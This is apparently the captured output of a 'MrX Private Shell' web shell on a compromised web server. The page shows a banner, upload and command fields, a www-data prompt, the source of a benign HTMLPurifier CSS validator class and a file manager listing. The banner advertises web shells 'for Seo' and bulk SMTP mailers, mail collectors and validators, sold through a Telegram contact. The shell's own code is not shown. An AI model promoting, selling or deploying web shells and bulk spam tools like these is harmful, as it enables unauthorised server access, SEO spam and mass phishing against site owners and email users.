__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.148: ~ $
<?php

/**
 * Validates the value for the CSS property text-decoration
 * @note This class could be generalized into a version that acts sort of
 *       like Enum except you can compound the allowed values.
 */
class HTMLPurifier_AttrDef_CSS_TextDecoration extends HTMLPurifier_AttrDef
{

    /**
     * @param string $string
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool|string
     */
    public function validate($string, $config, $context)
    {
        static $allowed_values = array(
            'line-through' => true,
            'overline' => true,
            'underline' => true,
        );

        $string = strtolower($this->parseCDATA($string));

        if ($string === 'none') {
            return $string;
        }

        $parts = explode(' ', $string);
        $final = '';
        foreach ($parts as $part) {
            if (isset($allowed_values[$part])) {
                $final .= $part . ' ';
            }
        }
        $final = rtrim($final);
        if ($final === '') {
            return false;
        }
        return $final;
    }
}

// vim: et sw=4 sts=4

Filemanager

Name Type Size Permission Actions
AlphaValue.php File 793 B 0644
Background.php File 3.24 KB 0644
BackgroundPosition.php File 4.07 KB 0644
Border.php File 1.55 KB 0644
Color.php File 4.57 KB 0644
Composite.php File 1.3 KB 0644
DenyElementDecorator.php File 1.05 KB 0644
Filter.php File 2.27 KB 0644
Font.php File 6.45 KB 0644
FontFamily.php File 9.13 KB 0644
Ident.php File 724 B 0644
ImportantDecorator.php File 1.56 KB 0644
Length.php File 1.85 KB 0644
ListStyle.php File 2.84 KB 0644
Multiple.php File 2.04 KB 0644
Number.php File 2.23 KB 0644
Percentage.php File 1.25 KB 0644
TextDecoration.php File 1.13 KB 0644
URI.php File 2.51 KB 0644
Filemanager